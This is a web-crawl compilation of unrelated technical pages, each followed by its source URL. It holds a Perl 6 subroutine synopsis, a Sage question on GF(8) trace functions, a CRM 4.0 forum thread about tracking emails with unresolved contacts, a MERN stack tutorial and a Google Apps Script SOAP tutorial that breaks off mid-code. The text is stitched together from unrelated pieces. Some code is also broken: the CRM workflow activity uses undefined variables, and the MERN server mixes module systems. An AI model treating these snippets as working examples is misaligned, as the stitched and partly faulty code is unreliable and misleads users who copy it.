
Subroutines (keyword: sub) are noninheritable routines with parameter lists.

Methods (keyword: method) are inheritable routines that always have an associated object (known as their invocant) and belong to a particular class.

Submethods (keyword: submethod) are noninheritable methods, or subroutines masquerading as methods. They have an invocant and belong to a particular class.

Multimethods (keyword: multi) are routines that do not belong to a particular class, but which have one or more invocants.

Rules (keyword: rule) are methods (of a grammar) that perform pattern matching. Their associated block has a special syntax (see Synopsis 5).

Macros (keyword: macro) are routines whose calls execute as soon as they are parsed (i.e. at compile-time). Macros may return another source code string or a parse-tree.

Standard Subroutines

The general syntax for named subroutines is any of:

    my RETTYPE sub NAME ( PARAMS ) TRAITS {...}
    our RETTYPE sub NAME ( PARAMS ) TRAITS {...}
    sub NAME ( PARAMS ) TRAITS {...}

The general syntax for anonymous subroutines is:

    sub ( PARAMS ) TRAITS {...}

"Trait" is the new name for a compile-time (is) property.
See Traits and Properties.

Perl5ish Subroutine Declarations

You can still declare a sub without a parameter list, as in Perl 5:

    sub foo {...}

Arguments still come in via the @_ array, but they are constant aliases to actual arguments:

    sub say { print qq{"@_"\n}; }   # args appear in @_
    sub cap { $_ = uc $_ for @_ }   # Error: elements of @_ are constant

If you need to modify the elements of @_, then declare it with the is rw trait:

    sub swap (*@_ is rw) { @_[0,1] = @_[1,0] }

Blocks

Raw blocks are also executable code structures in Perl 6. Every block defines a subroutine, which may either be executed immediately or passed in as a Code reference argument to some other subroutine.

"Pointy subs"

The arrow operator -> is almost a synonym for the anonymous sub keyword. The parameter list of a pointy sub does not require parentheses, and a pointy sub may not be given traits.

    $sq = -> $val { $val**2 };  # Same as: $sq = sub ($val) { $val**2 };

    for @list -> $elem {        # Same as: for @list, sub ($elem) {
        print "$elem\n";        #              print "$elem\n";
    }                           #          }

Stub Declarations

Globally Scoped Subroutines

Subroutines and variables can be declared in the global namespace, and are thereafter visible everywhere in a program. Global subroutines and variables are normally referred to by prefixing their identifier with *, but it may be omitted.

Lvalue Subroutines

    {
        my $proxy is Proxy(
            FETCH => sub ($self) { return lastval(); },
            STORE => sub ($self, $val) {
                die unless check($passwd);
                lastval() = $val;
            },
        );
        return $proxy;
    }

Operator Overloading

Operators are just subroutines with special names. Unary operators are defined as prefix or postfix:

    sub prefix:OPNAME ($operand) {...}
    sub postfix:OPNAME ($operand) {...}

Binary operators are defined as infix:

    sub infix:OPNAME ($leftop, $rightop) {...}

Bracketing operators are defined as circumfix. The leading and trailing delimiters together are the name of the operator.
    sub circumfix:LEFTDELIM...RIGHTDELIM ($contents) {...}
    sub circumfix:DELIMITERS ($contents) {...}

If the left and right delimiters aren't separated by "...", then the DELIMITERS string must have an even number of characters. The first half is treated as the opening delimiter and the second half as the closing. Operator names can be any sequence of Unicode characters. For example:

    sub infix:(c) ($text, $owner) { return $text but Copyright($owner) }

    method prefix:± (Num $x) returns Num { return +$x | -$x }

    multi postfix:! (Int $n) { $n<2 ?? 1 :: $n*($n-1)! }

    macro circumfix:<!--...--> ($text) { "" }

    my $document = $text (c) $me;
    my $tolerance = ±7!;
    <!-- This is now a comment -->

Parameters and Arguments

Perl 6 subroutines may be declared with parameter lists. By default, all parameters are constant. Arguments destined for required parameters must come before those bound to optional parameters. Arguments destined for positional parameters must come before those bound to named parameters.

Invocant Parameters

Invocants are specified at the start of the parameter list, with a colon terminating the list of invocants:

    multi handle_event ($window, $event: $mode) {...}   # two invocants

Multimethod invocant arguments are passed positionally, though the first invocant can be passed via the method call syntax:

The first invocant is always the topic of the corresponding method or multimethod.
http://www.perl.com/pub/a/2003/04/09/synopsis.html
Trace function over GF(q)

Hi,

I understand the idea of defining functions over GF(q), which you explained to me very precisely. Now I have the following problem. I want to define the function:

    f(x,y) = Tr(x*g(y/x)),

where Tr(x) = x + x^2 + x^4 (Tr: GF(8) --> GF(2)) and

    x*g(y/x) = [(y*[d^2*[(y/x)^3+1]+d^2*(1+d+d^2)*[(y/x)^2+(y/x)]])/((y/x)^4+d^2*(y/x)^2+1)]+(y/x)^(1/2).

Let (for example) d=3. With the convention that 1/0=0 (so y/0=0), I want to see what values this function f takes. How can I do this in Sage?

What I did (with your help):

    def custom_divide(x, y):
        if y == 0:
            return 0
        return x/y

    F.<a> = GF(8)
    for a, b in F^2:
        print "x: ", a, "y: ", b, "x/y: ", custom_divide(a, b)

    F.<a> = GF(8)
    for a, b in F^2:
        print "x*y: ", a*b, "(x*y)^2: ", (a*b)^2, "(x*y)^(1/2): ", (a*b).nth_root(2)

I'm stuck here because I'm not sure how to define such a function f. Any help/advice will be highly appreciated. I can provide more details if something is not clear.

Best regards,
Arczi
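For readers without a Sage session handy, the building blocks of f can be sketched in plain Python. This is an illustrative sketch, not Sage code: it assumes GF(8) is built as GF(2)[x]/(x^3 + x + 1) (the Conway polynomial, which Sage uses by default for GF(8)), represents elements as 3-bit integers, and implements Tr(x) = x + x^2 + x^4 together with the question's 1/0 = 0 convention:

```python
# GF(8) as GF(2)[x]/(x^3 + x + 1); an element is an int 0..7, where bit i
# holds the coefficient of x^i. Addition in GF(2^k) is bitwise XOR.
MOD = 0b1011  # the reduction polynomial x^3 + x + 1

def gf8_mul(a, b):
    """Multiply two GF(8) elements: carry-less product, then reduce mod MOD."""
    p = 0
    for i in range(3):
        if (b >> i) & 1:
            p ^= a << i
    for deg in (4, 3):          # fold any x^4 / x^3 terms back down
        if (p >> deg) & 1:
            p ^= MOD << (deg - 3)
    return p

def gf8_pow(a, n):
    r = 1
    for _ in range(n):
        r = gf8_mul(r, a)
    return r

def gf8_inv(a):
    """Inverse via a^6: the multiplicative group has order 7, so a * a^6 = 1."""
    return gf8_pow(a, 6)

def custom_divide(x, y):
    """The question's convention: anything divided by 0 is 0."""
    if y == 0:
        return 0
    return gf8_mul(x, gf8_inv(y))

def trace(x):
    """Tr: GF(8) -> GF(2), Tr(x) = x + x^2 + x^4."""
    return x ^ gf8_pow(x, 2) ^ gf8_pow(x, 4)
```

From here, f(x, y) is just a composition of gf8_mul, custom_divide, and trace; square roots come for free as gf8_pow(a, 4), since squaring is a bijection on GF(8) and (a^4)^2 = a^8 = a.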
https://ask.sagemath.org/question/8891/trace-function-over-gfq/?sort=latest
CRM 4.0: How to handle when a user clicks "Track in CRM" on an email that doesn't exist on a contact

Tuesday, December 09, 2008 9:54 AM

I have been asked to write some code to handle the following problem: if a user in Outlook clicks "Track in CRM" on a mail with an email address that does not exist in CRM on any contact, the email is put in the database with no relationship to any record, so it is kind of "lost". So instead they (the CRM guys) want me to write some code so that when a user clicks "Track in CRM", the code searches all contacts to see if that email exists, and if not, gives a warning that this contact email does not exist and asks whether they would like to create the contact. If they click yes to create the contact, I should bring up the "New contact" window in CRM. And when the contact is created, then the tracking can be applied.

I have never programmed against CRM before, so please treat me as a novice in CRM. I am grateful for all the help I can get. What I know so far is that the event that fires when a user clicks "Track in CRM" is called the CreateNewEmail activity. However, I do not know if this should be solved by writing a Workflow or if it is a JScript solution.

All Replies

Tuesday, December 09, 2008 1:54 PM

You can not do this in JavaScript because the button is an "MS CRM Outlook Client Add-On". You can not do it in Workflow because workflows get executed server-side and do not have a user interface element. If you really want to implement this functionality you will need to write an Outlook "Add-On" in C#.

The new email activity is created when the email is sent, so it is not really useful in your case, as you want your function to search the MS CRM database and provide the user with a custom option to create a new contact if it does not exist.

Simple solution: why don't you ask users to type the name of the person they want to send the email to in the "To" field and then click the "Check Names" function of Outlook.
If nothing is returned, then they can go in and create the contact. You can read more about this at the URL below:

Hassan.

Tuesday, December 09, 2008 2:36 PM

Thanks for the reply. That saves me a lot of trouble of trying and failing. However, your solution does not solve the problem. The problem is that the users, say, get an email from someone and then decide that they want this email tracked in CRM. So they click the "Track in CRM" button. But if for some reason this person's email was not already in CRM as one of the contacts' emails, then the tracking just lies "hidden" in the database with no connection to any contact. Hence you cannot find it later in CRM (without going into the database table). Yet for the user it looks like it is being tracked, as the icon changes on the email in the Outlook client. For the users this seems like a big bug, as it does not give a warning saying you cannot track this in CRM because this contact does not exist. So this is not necessary when sending an email; it most often is when receiving an email.

Any other ideas on how I can solve this?

Lisa-Marie

Tuesday, December 09, 2008 2:44 PM

Yes. All emails not associated with any contact are visible in MS CRM with a RED exclamation mark. You do not need to look in the database for those emails. To view such emails go to My Workplace -> Activities -> Filter by Email -> Received Emails. You will see emails that were tracked by MS CRM because the user clicked on the "Track in MS CRM" button but MS CRM could not find a contact to associate the email with. When you click on the red exclamation mark, the system will let you associate the email with an existing contact OR let you create a new contact. Let your users know how to do this and make it a part of your SOP (Standard Operating Procedure). This should solve your problem.

Hassan.

Tuesday, December 09, 2008 10:05 PM

Hi, ok, sounds reasonable. Thank you!
Do you mean the System Administrator, and that person should be responsible for resolving missing contacts as an SOP? Also, did you possibly mean a RED question mark? That seems to be the only thing I see when I follow your instructions. And also I do not have a filter for received emails, just "My received emails", so I guess the administrator needs to use the filter "All Emails" and go through all of those with a RED question mark and resolve the missing contacts?

Lisa-Marie

Wednesday, December 10, 2008 12:03 PM

Hi again. I presented your solution to the system administrator, who is also a user of CRM, and she was not pleased with this solution. She thinks it is not very user friendly. Also, she will not always know the contact details for contacts, and therefore can't create the missing contacts. And if she is the one creating the contact, then she is the owner of the contact, and that, according to her, is not correct.

We discussed some options and found another approach to this problem. This is the solution: "Create a workflow that starts when a new email is tracked in CRM. This workflow needs to check if there are any conflicts with the TO and FROM contacts in the email, and if there are, it should send an email to the creator of the tracking that there is an unresolved contact in this email tracking, and include a link that will open up the tracked email in CRM and let the user fix it themselves from there."

So the question now is: how can I implement this workflow? Keep in mind I am still a novice in CRM. However, I have programmed workflows in SharePoint before, so I assume there are some similarities. All help is appreciated!

Lisa-Marie

Wednesday, December 10, 2008 3:22 PM

Hi Lisa, if you want to do this using workflow you will need to create a workflow assembly. Download the SDK; you will find sample code to do what you are trying to do. You can download the SDK from the URL below:

Wednesday, December 10, 2008 3:51 PM

Great, thanks.
I was trying to create a simple workflow in the GUI, but I don't think I have the tools to check if the email has a "recipient not resolved to a record" error on it, and therefore I cannot do this. I will make use of the SDK and see if I can find more there. I need help finding the property names for the error message "At least one recipient could not be resolved to a record in the system". And also, what is the property name to get the direct link to open the specific email in CRM? I want to create a task for the user that started the tracking of the email, saying that he must add a contact, and in the task have the link directly to the email.

Regards,
Lisa-Marie

Wednesday, December 10, 2008 4:12 PM

Lisa, all records in MS CRM have a GUID. You need to create a workflow that runs when an email activity is created. You need to pass the GUID of the new email to your custom code. You will then check if it is an incoming email or an outgoing email. If incoming, you will need to use "CheckIncomingEmailResponse.ReasonCode". Check the SDK for details.

Hassan.

Thursday, December 11, 2008 11:00 AM

Hassan, what do I do with the GUID? Do I need to use the CrmService to get the email based on the GUID? How do I check if the email is incoming or outgoing? So if I have understood you correctly, I should create a custom activity that checks an email to see if it has a ReasonCode equal to "unresolved contact", and have the activity return true or false. Then I create a workflow in CRM and make use of this custom activity, and the rest of the workflow steps I can create through the CRM GUI?

Thanks for all the help.
Lisa-Marie

Thursday, December 11, 2008 11:18 AM

Hi Lisa,

>> Do I need to use the CrmService to get the Email based on the GUID?
Yes.

>> How do I check if the email is incoming or outgoing?
You use the "directioncode" attribute of the email entity.

>> So if I have understood you correctly I should create a custom activity that checks an email if it has a ReasonCode equal to Unresolved contact.
And have the activity return true or false.
NO. You don't need to create any custom entities. The Email entity you retrieve by using the GUID will give you the ReasonCode you will need to use.

>> Then I create a Workflow in CRM and make use of this custom activity. The rest of the workflow steps I can create through the CRM GUI?
No. You create a workflow to capture the "New Email activity created" event. Your workflow fires off when a new email activity is created in the system. Your workflow will pass the GUID of the new email to your assembly.

Hassan.

Thursday, December 11, 2008 12:00 PM

Hassan, what I tried to say is that I need to create a Custom Workflow Activity that I can use in a CRM workflow, and that I don't have to write the entire workflow in code but can create most of the workflow in CRM and, in that, make use of the custom workflow activity that I have created in code.

I looked at the ReasonCode, but I don't understand how I can use it to tell if contacts in the TO or FROM field are missing a record in CRM. Also, I do not really care if the email is incoming or outgoing, as I need to check both types of emails. In the TO/FROM field of an email there could be more than one contact, and there could also be 1 of 5 contacts missing a record whilst the other 4 are fine. I found this code; and have made use of a lot from here. I believe I am on the right way finally.

Thursday, December 18, 2008 8:58 AM

Hi Hassan, did you or anyone else have an answer to my last post?

Regards,
Lisa-Marie

Thursday, December 18, 2008 1:53 PM

Hi Lisa, no replies yet. How are you getting on? Found a solution yet?

Hassan.

Thursday, January 08, 2009 2:12 PM

It has been on hold over Christmas, so I needed to get back into it again. No, unfortunately I have not found a solution.
So far this is the code I have written for the custom activity:

    namespace CreateResolveContactProblemTask
    {
        [CrmWorkflowActivity("Check For Unresolved Contacts", "Custom Activities Library")]
        public sealed partial class CheckForUnresolvedContacts : SequentialWorkflowActivity
        {
            [CrmInput("Current EmailID")]
            [CrmReferenceTarget("email")]
            public Lookup CurrentEmailId { get; set; }

            #region Dependency Properties
            /// <summary>
            /// Using a DependencyProperty as the backing store for EmailGuid.
            /// This enables animation, styling, binding, etc...
            /// </summary>
            public static readonly DependencyProperty CurrentEmailIdProperty =
                DependencyProperty.Register("CurrentEmailId", typeof(Lookup), typeof(CheckForUnresolvedContacts));

            /// <summary>
            /// Returns true or false if this email had an unresolved contact
            /// </summary>
            [CrmOutput("Has Unresolved Contacts")]
            public bool HasUnresolvedContacts { get; set; }
            #endregion

            public CheckForUnresolvedContacts()
            {
                InitializeComponent();
            }

            protected override ActivityExecutionStatus Execute(ActivityExecutionContext executionContext)
            {
                // Use the context service to create an instance of CrmService
                ICrmService crmService = context.CreateCrmService();
                Guid newEmailId = CurrentEmailId.Value;
                try
                {
                    // (retrieval of crmEmail is not implemented yet)
                    if (crmEmail != null)
                    {
                        // directioncode = true if email is outgoing
                        if (crmEmail.directioncode.Value)
                        {
                        }
                    }
                }
                catch (System.Web.Services.Protocols.SoapException se)
                {
                    TextWriter w = new StreamWriter(@"C:\Downloads\SeCrmerror.txt");
                    w.WriteLine(se.Message + " " + se.InnerException.Message);
                    w.Close();
                    return ActivityExecutionStatus.Faulting;
                }
                catch (Exception ex)
                {
                    TextWriter w = new StreamWriter(@"C:\Downloads\ExCrmerror.txt");
                    w.WriteLine(ex.Message + " " + ex.InnerException.Message);
                    w.Close();
                    return ActivityExecutionStatus.Faulting;
                }
                return base.Execute(executionContext);
            }
        }
    }

I need to figure out how to debug so that I can find the answer to how to check for the error.
Copy the assembly to the standard plug-in folder on the server: <crm-root>\Server\bin\assembly. If there is another copy of the assembly at the same location and you cannot overwrite that copy because it is locked by Microsoft Dynamics CRM, run the iisreset program in a command window to free the assembly. - <crm-root>\Server\bin\assembly folder and IIS must then be restarted. After debugging has been completed, you must remove the .pdb file and reset IIS to prevent the w3wp.exe process from consuming additional memory. you may not know which process to attach to. You can do an IIS reset to terminate those processes. Next, open or refresh the Microsoft Dynamics CRM Web application to start the process. - Register the plug-in in the database. After the edit/compile/deploy/test/debug cycle for your plug-in has been completed, unregister the (on-disk) plug-in assembly and then reregister the plug-in in the Microsoft Dynamics CRM database. - Wednesday, July 21, 2010 9:30 AM
http://social.microsoft.com/forums/en-US/crmdevelopment/thread/74702ed5-bf96-413b-bed9-df727407553f/
The MERN stack consists of MongoDB, Express, React / Redux, and Node.js. Given the popularity of React on the frontend and of Node.js on the backend, the MERN stack is one of the most popular stacks of technologies for building a modern single-page app. Here's a breakdown of the typical stack setup:

MongoDB as a NoSQL database

- An open source document database that provides persistence for application data.
- Bridges the gap between key-value stores (fast and scalable) and relational databases (rich functionality).
- Stores data as JSON documents in collections with dynamic schemas.
- Designed with scalability and developer agility in mind.
- Designed to be used asynchronously, thus it pairs well with Node.js applications.

Express web framework of Node.js provides routing and middleware

- Basically runs the backend code as a module within the Node.js environment.
- Handles the routing of requests to the right parts of your app.

React.js provides a dynamic frontend

- A JavaScript library developed by Facebook to build interactive / reactive interfaces.

Node.js on the server

- A JavaScript runtime environment.
- An asynchronous event-driven engine - which means the app makes a request for some data and then performs other tasks while waiting for a response.

The MERN stack wasn't always the frontrunner in the JavaScript web app game. Many companies and developers still use the MEAN stack, which is identical to the MERN stack except it uses AngularJS or Angular instead of React for the frontend. One of React's distinguishing features is its virtual DOM manipulation, which helps keep apps dynamic and fast.

Before Getting Started

There are plenty of starter kits out there for people who just want to get a CRUD full-stack app up and running. These tools won't give you everything you need for a MERN app, but they will give you a head start.

- Create React App provides a simple npm package to create a React App with no build configuration.
- mern.io provides a boilerplate project and a command line interface utility.

In this post we'll set up everything from scratch, however, to give you a better idea of how the pieces fit together.

Getting Started

- Create a directory on your computer called mern-starter (or whatever you like). cd into that directory.
- Create a backend and a frontend repo on GitHub or using the command line.
- Clone both repos into the mern-starter directory. cd into the backend repo and run npm init -y.
- Next, run touch index.js README.md .eslintrc.json .eslintignore .gitignore .env.
- Then, run npm i -S express http-errors mongoose superagent body-parser cors dotenv.
- Finally, run npm i -D jest eslint.

With that, we've got our basic scaffolding set up for the backend. Go ahead and configure your .eslintrc.json, .eslintignore, .gitignore and .env. Your .env file should contain your environment variables:

.env

    PORT=3000
    DEBUG=true
    API_URL=
    CORS_ORIGINS=
    APP_SECRET='something secret'
    MONGODB_URI=mongodb://localhost/mern-starter

Your package.json should have all of the installed dependencies as well as these scripts:

package.json

    "scripts": {
      "lint": "eslint ./",
      "test": "jest -i --verbose --coverage --runInBand",
      "start": "node index.js",
      "dboff": "killall mongod",
      "watch": "nodemon index.js",
      "dbon": "mkdir -p ./db && mongod --dbpath ./db"
    },
Navigate into the lib folder and create a server.js file - this is where we are going to set up our server and connect it to MongoDB:

server.js

    'use strict'

    import cors from 'cors';
    import express from 'express';
    import mongoose from 'mongoose';
    import bodyParser from 'body-parser';

    const app = express();
    const router = express.Router();

    // env variables
    const PORT = process.env.PORT || 3000;
    const MONGODB_URI = process.env.MONGODB_URI || 'mongodb://localhost/mern-starter';

    mongoose.Promise = Promise;
    mongoose.connect(MONGODB_URI);

    app.use(bodyParser.json(), cors());
    app.use(require('../route/auth-router'));

    app.all('*', (request, response) => {
      console.log('Returning a 404 from the catch-all route');
      return response.sendStatus(404);
    });

    // error middleware
    app.use(require('./error-middleware'));

    // keep a handle on the listening server so stop() can actually close it
    // (an Express app has no close() method of its own)
    let server = null;

    export const start = () => {
      server = app.listen(PORT, () => {
        console.log(`Listening on port: ${PORT}`);
      });
    };

    export const stop = () => {
      server.close(() => {
        console.log(`Shut down on port: ${PORT}`);
      });
    };

This is a very basic server setup. At the top of our file we are importing our npm packages. We are setting up our express router and connecting to mongoose, then requiring-in our routes and middleware. We then export the start and stop functions that turn our server on and off and log what PORT we are on. The next thing we need is to go into our index.js file at the root of our backend repo and require('./src/lib/server').start(). This requires-in our server file and starts the server.

Schema and Models

Keep in mind you should create at least one model and one route before trying to start the server. Below you'll find a sample mongoose Schema (mongoose is MongoDB object modeling for Node) and a sample route. We'll create a user Schema, aka a user model. Everything in Mongoose starts with a Schema. Each schema maps to a MongoDB collection and defines the shape of the documents within that collection.
Here we are declaring all of the properties we can expect users to have attached to their model, what data type they are, whether they are unique or not, and whether we want them to be required or not. In this same file we can create methods like User.create(), which is how we create new users.

models/user.js

    const mongoose = require('mongoose');

    const userSchema = mongoose.Schema({
      passwordHash: { type: String, required: true },
      email: { type: String, required: true, unique: true },
      username: { type: String, required: true, unique: true },
      tokenSeed: { type: String, required: true, unique: true },
      created: { type: Date, default: () => new Date() },
    });

    const User = module.exports = mongoose.model('user', userSchema);

And then in the following snippet are auth routes - we're using express's Router to create routes and endpoints allowing a user to sign up or log in to our app:

routes/user.routes.js

    'use strict'

    import { Router } from 'express';
    import bodyParser from 'body-parser';
    import basicAuth from '../lib/basic-auth-middleware.js';
    import User from '../model/user.js';

    // jsonParser was referenced below but never defined in the original snippet
    const jsonParser = bodyParser.json();

    const authRouter = module.exports = new Router();

    authRouter.post('/api/signup', jsonParser, (req, res, next) => {
      console.log('hit /api/signup');
      User.create(req.body)
        .then(token => res.send(token))
        .catch(next);
    });

    authRouter.get('/api/login', basicAuth, (req, res, next) => {
      console.log('hit /api/login');
      req.user.tokenCreate()
        .then(token => res.send(token))
        .catch(next);
    });

Now we should be able to go to our terminal, make sure we cd into the backend repo, and run the command npm run dbon; this should start MongoDB. Then open a new backend terminal tab and run the command npm run start. And that's it for a bare-minimum backend setup! Let's now set up a very basic frontend with React.

Frontend Setup

- cd into the frontend directory and run npm init -y to create a package.json file.
- Next, run touch README.md .eslintrc.json .eslintignore .gitignore .env .babelrc webpack.config.js.
- Then, run npm i -S babel-core babel-loader babel-plugin-transform-object-rest-spread babel-preset-env babel-preset-react css-loader extract-text-webpack-plugin html-webpack-plugin node-sass react react-dom resolve-url-loader sass-loader webpack webpack-dev-server babel-cli.
- Be aware that extract-text-webpack-plugin is now deprecated in webpack 4.0.0.
- Then run npm i -D jest eslint.

Open your code editor and add these scripts to your package.json:

package.json

    "scripts": {
      "lint": "eslint . ",
      "build": "webpack",
      "watch": "webpack-dev-server --inline --hot"
    },

We're using the --hot flag to enable webpack's Hot Module Replacement.

Create a src folder at the root of the frontend repo. Inside of src create a main.js file that has:

main.js

    import React from 'react';
    import ReactDom from 'react-dom';
    import App from './components/app';

    const container = document.createElement('div');
    document.body.appendChild(container);

    ReactDom.render(<App />, container);

Inside of src create a components folder, and inside of the components folder create a folder named app.
Inside of the app folder create an index.js that has the following code:

components/app/index.js

    import React from 'react';

    class App extends React.Component {
      constructor(props) {
        super(props);
      }

      render() {
        return (
          <div>
            <h1>MERRRRRN</h1>
          </div>
        );
      }
    }

    export default App;

Plus, let's add a webpack configuration file:

webpack.config.js

    'use strict'

    const ExtractPlugin = require('extract-text-webpack-plugin')
    const HTMLPlugin = require('html-webpack-plugin')

    module.exports = {
      devtool: 'eval',
      entry: `${__dirname}/src/main.js`,
      output: {
        filename: 'bundle-[hash].js',
        path: `${__dirname}/build`,
        publicPath: '/',
      },
      plugins: [
        new HTMLPlugin(),
        new ExtractPlugin('bundle-[hash].css'),
      ],
      module: {
        rules: [
          {
            test: /\.js$/,
            exclude: /node_modules/,
            loader: 'babel-loader',
          },
          {
            test: /\.scss$/,
            loader: ExtractPlugin.extract(['css-loader', 'sass-loader']),
          },
        ],
      },
    }

We're using the Sass loader, so your project can make use of Sass files for styling. Here's also our Babel configuration file:
😅 Connecting the Frontend to the Backend Here’s an example of a request made inside of a handleSubmit(e) method, inside of a handleSubmit(e) { e.preventDefault(); return superagent.get(`${__API_URL__}/api/flights/${ this.state.from }/${ this.state.to }`) .then(res => { this.setState({ flights: [...res.body], hasSearched: true, }); }).catch(err => { this.setState({ hasError: true, }); }); } In this example, when handleSubmit is invoked by the user on the frontend, we use superagent to make a GET request to fetch our data from the backend, and we set hasSearched to true on the state of our component. And that, y'all, is a full-stack MERN app. 🎉
https://alligator.io/react/mern-stack-intro/
Dec 2009

Goal

This tutorial guides you through the steps of invoking a Soap service operation.

Time to Complete

Approximately 20 minutes

Index

This tutorial is divided into the following sections:

- Section 1: Creating a Wsdl Object
- Section 2: Querying a Wsdl Object
- Section 3: Getting a WsdlService Object
- Section 4: Querying a WsdlService Object
- Section 5: Creating Web Service Parameters
- Section 6: Testing a Soap Operation
- Section 7: Invoking a Soap Operation
- Section 8: Working with a Soap Operation Result
- Summary and Complete Code

Section 1: Creating a Wsdl Object

To help demonstrate this, we will use a simple and free SOAP web service provided by WebserviceX called GeoIPService. This web service allows you to easily look up the country of origin for a given IP address. To use the SOAP library, the first thing you need is the WSDL file associated with the web service. WSDL (which stands for 'Web Service Definition Language') files contain the necessary metadata to let the library know where the service can be reached and which operations can be used. For this service, the WSDL can be found at "". Feel free to take a look. It's just a small XML file that describes what services and operations are available, and what types of arguments they expect to be given.

Once you have the location of the WSDL file, you can start using it in Google Apps Script like so:

    var wsdl = SoapService.wsdl("");

Section 2: Querying a Wsdl Object

SoapService.wsdl will return an object of type Wsdl that has several helpful methods on it to help you introspect the WSDL description at the specified location. For now, we'll use the method getServiceNames to determine what services are available. Normally, there will just be a single service available, but sometimes there might be more. You can invoke this method and log the results like so:

    Logger.log(wsdl.getServiceNames());

Running this and checking the log, you will see that one service was returned: 'GeoIPService'.
(If you look at the original WSDL file, you'll see that this was the one service defined in it, like so: <wsdl:service ...>.)

Section 3: Getting a WsdlService Object

Now, we can start checking out that service to see what operations it makes available. There are two methods to get to the actual service. The first is to simply call getService on the Wsdl object with the name of the service returned above, i.e.:

```javascript
var geoService = wsdl.getService("GeoIPService");
```

The second is to get it like so:

```javascript
var geoService = wsdl.getGeoIPService();
```

How is it that this object has a method on it that's so specific to this particular web service? Thanks to the power of JavaScript's dynamic type system, the Soap library is able to generate these convenience methods for you, so your code can be far more direct about what it's trying to do without having to pass strings around all the time. So why would you ever use the first form? Sometimes SOAP services will have names for things that can't be represented in JavaScript. For these situations, the first form provides a system that will always work no matter what the service name is.

Section 4: Querying a WsdlService Object

Now that you have the Service object, it's time to figure out what you can do with it. For that, you use the helpful getOperationNames method. As before, here's how you can invoke that method and log the result to take a look at:

```javascript
Logger.log(geoService.getOperationNames());
```

This will return the following result: [GetGeoIP, GetGeoIPContext]. As expected, these are the same names of the operations listed on the original WebserviceX page. For this example, you're going to want to invoke the GetGeoIP operation.

Section 5: Creating Web Service Parameters

Now that you've found the operation we want, it's time to invoke your first web service. For this step it can be helpful to see how the web service is invoked currently. To determine this, you can either use one of the many Soap tools out there.
Or, conveniently, WebserviceX has pages that demonstrate their web services in action. You can try this out now by going from the original WebserviceX page to the specific operation page for GetGeoIP. On this page you can experiment by plugging in your own IP address, or just a sample IP address like "72.14.228.129". On the WebserviceX demonstration page you can see documentation showing that the web service is invoked with a message like so:

```
POST /geoipservice.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: ""

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:...>
  <soap:Body>
    <GetGeoIP xmlns="">
      <IPAddress>72.14.228.129</IPAddress>
    </GetGeoIP>
  </soap:Body>
</soap:Envelope>
```

This would normally be a lot of infrastructure for you to handle. However, the Soap library will take care of most of this for you! All you need to provide is the following section from inside the <soap:Body> tag, and the library will take care of the rest:

```
<GetGeoIP xmlns="">
  <IPAddress>72.14.228.129</IPAddress>
</GetGeoIP>
```

To generate this snippet of XML, several helper methods are provided. For the above, you would use the following code:

```javascript
var param = Xml.element("GetGeoIP", [
  Xml.attribute("xmlns", ""),
  Xml.element("IPAddress", [ "72.14.228.129" ])
]);
```

For full details on creating XML, please see the Xml Documentation.

Section 6: Testing a Soap Operation

Once you've created the parameter to pass to the web service, you can verify that the right message is being created by using the debugging method getSoapEnvelope on the service object. This method does every step of the soap operation except for actually sending the message to the service on the Internet. This lets you see what is being generated in case you need to tweak or debug things.
You can try it and check the results like so:

```javascript
var envelope = geoService.getSoapEnvelope("GetGeoIP", param);
Logger.log(envelope);
```

In the logs you should now see:

```
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<SOAP-ENV:Envelope xmlns:...>
  <SOAP-ENV:Body>
    <GetGeoIP xmlns="">
      <IPAddress>72.14.228.129</IPAddress>
    </GetGeoIP>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```

This is exactly the same as the XML shown above (except for some minor changes in how namespaces are named). With this, you can see that the message looks right and it's finally time to invoke the web service.

Section 7: Invoking a Soap Operation

To invoke the web service, two methods are provided. You can either call:

```javascript
var result = geoService.invokeOperation("GetGeoIP", [param]);
```

or

```javascript
var result = geoService.GetGeoIP(param);
```

As before (with getService), we have automatically generated the method name from information in the WSDL file to make it easy for you to invoke. The latter form makes the code simpler and allows you to invoke the service with a minimum of fuss. However, if the operation name cannot be expressed in JavaScript, the former form is provided so that you can always invoke it.

Section 8: Working with a Soap Operation Result

Now that you've invoked the SOAP operation, it's time to work with the result provided. Because SOAP is a system for passing XML messages back and forth, the result returned is itself XML. To view the XML, you can call the helpful debugging method toXmlString on it like so:

```javascript
Logger.log(result.toXmlString());
```

In the logs you'll now see:

```
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<GetGeoIPResponse xmlns="">
  <GetGeoIPResult>
    <ReturnCode>1</ReturnCode>
    <IP>72.14.228.129</IP>
    <ReturnCodeDetails>Record Found</ReturnCodeDetails>
    <CountryName>UNITED STATES</CountryName>
    <CountryCode>US</CountryCode>
  </GetGeoIPResult>
</GetGeoIPResponse>
```

To get to the information we want (i.e.
the country code for the IP address), you can now simply "dot" into the returned XML object in a very natural way, like so:

```javascript
Logger.log(result.Envelope.Body.GetGeoIPResponse.GetGeoIPResult.CountryCode.Text);
```

These helpful properties were generated for you by the Xml library. You can reach nested elements with their tag name, and you can get the text contents of an Xml element with the "Text" property. For full information on how to simply access information in an XML document, please see the Xml Documentation. Checking the logs you will now see "US" printed.

Summary and Complete Code

And now you've done it! You've been able to go from an arbitrary IP address to the country that it belongs to in just a few simple steps. Here's the code in its entirety:

```javascript
function determineCountryFromIP(ipAddress) {
  var wsdl = SoapService.wsdl("");
  var geoService = wsdl.getGeoIPService();
  var param = Xml.element("GetGeoIP", [
    Xml.attribute("xmlns", ""),
    Xml.element("IPAddress", [ ipAddress ])
  ]);
  var result = geoService.GetGeoIP(param);
  return result.Envelope.Body.GetGeoIPResponse.GetGeoIPResult.CountryCode.Text;
}
```

It's just that simple to call into a SOAP service anywhere and process the result that you get back!
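The "dot" navigation in Section 8 is just plain JavaScript property access. Outside Apps Script you can picture the parsed result as a nested object — the following is an illustrative stand-in (a mock of the same shape, not the actual Xml library), runnable anywhere:

```javascript
// Illustrative mock of the parsed SOAP result used in Section 8.
// The real Xml library builds this structure from the response XML;
// here we hand-write the same shape to show the "dot" navigation.
const result = {
    Envelope: {
        Body: {
            GetGeoIPResponse: {
                GetGeoIPResult: {
                    ReturnCode: { Text: '1' },
                    IP: { Text: '72.14.228.129' },
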